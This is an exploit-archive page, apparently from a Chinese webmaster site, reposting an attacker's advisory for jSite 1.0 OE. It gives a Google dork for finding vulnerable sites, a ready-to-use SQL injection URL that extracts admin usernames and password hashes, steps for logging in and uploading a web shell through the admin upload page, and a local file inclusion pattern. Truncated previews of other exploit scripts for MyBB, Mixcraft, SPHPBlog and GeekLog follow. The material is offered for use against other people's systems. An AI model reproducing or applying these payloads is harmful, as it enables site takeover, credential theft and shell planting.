建站极客
网络安全 Exploit 正文
jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities
所属分类:
网络安全 / Exploit
阅读数:
88
收藏 0
赞 0
分享
--== ================================================================================ ==--
--== jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility ==--
--== ================================================================================ ==--
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=[ SQL Injection Exploit ]=-=-=-=-=-=-=-=-=-=-=-=-
AUTHOR: S.W.A.T.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
Download: http://www.sclek.com/jsite.zip
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DORK (google): "Powered by jSite 1.0 OE"
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DESCRIPTION:
You Can See Admin User & MD5 Password ..::.. Then You Can Crack It & Login ;)
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
EXPLOITS:
www.site.com/?page=-1/**/union/**/select/**/1,2,3,concat_ws
(0x3a,user,pass),admin/**/from/**/jsite_users/*
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
NOTE/TIP:
1 Week Off & I Be Back :D ;)
Admin Login Is At /admin/
U Can Upload Your Shell When U Login Successfully
From This Link: www.site.com/admin/index.php?menu=uploads
& Your Shell Will Be Appear Here: www.site.com/uploads/[file].php
-=-=-=-=-=-=--=-=-=-=-=-=-=-[ Local File Inclusion ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Exploit:
www.[target].com/Script/index.php?module=[LFI]
--== ================================================================================ ==--
--== jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility ==--
--== ================================================================================ ==--
MyBulletinBoard (MyBB) <?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe
评论 0
收藏 0
赞 0
分享
Acoustica Mixcraft #!/usr/bin/perl
#
# Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit
# Author: Koshi
#
# Date: 08-28-08 ( 0day )
# Ap
评论 0
收藏 0
赞 0
分享
Simple PHP Blog (SPHPBlog) <?
/*
sIMPLE php bLOG 0.5.0 eXPLOIT
bY mAXzA 2008
*/
function curl($url,$postvar){
global $cook;
$ch = cur
评论 0
收藏 0
赞 0
分享
GeekLog #!/usr/bin/perl
use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
评论 0
收藏 0
赞 0
分享
NoName Script ################################################################################
[ ] NoName Script 1.1 BETA Multiple Remote Vulnerabiliti
评论 0
收藏 0
赞 0
分享
查看更多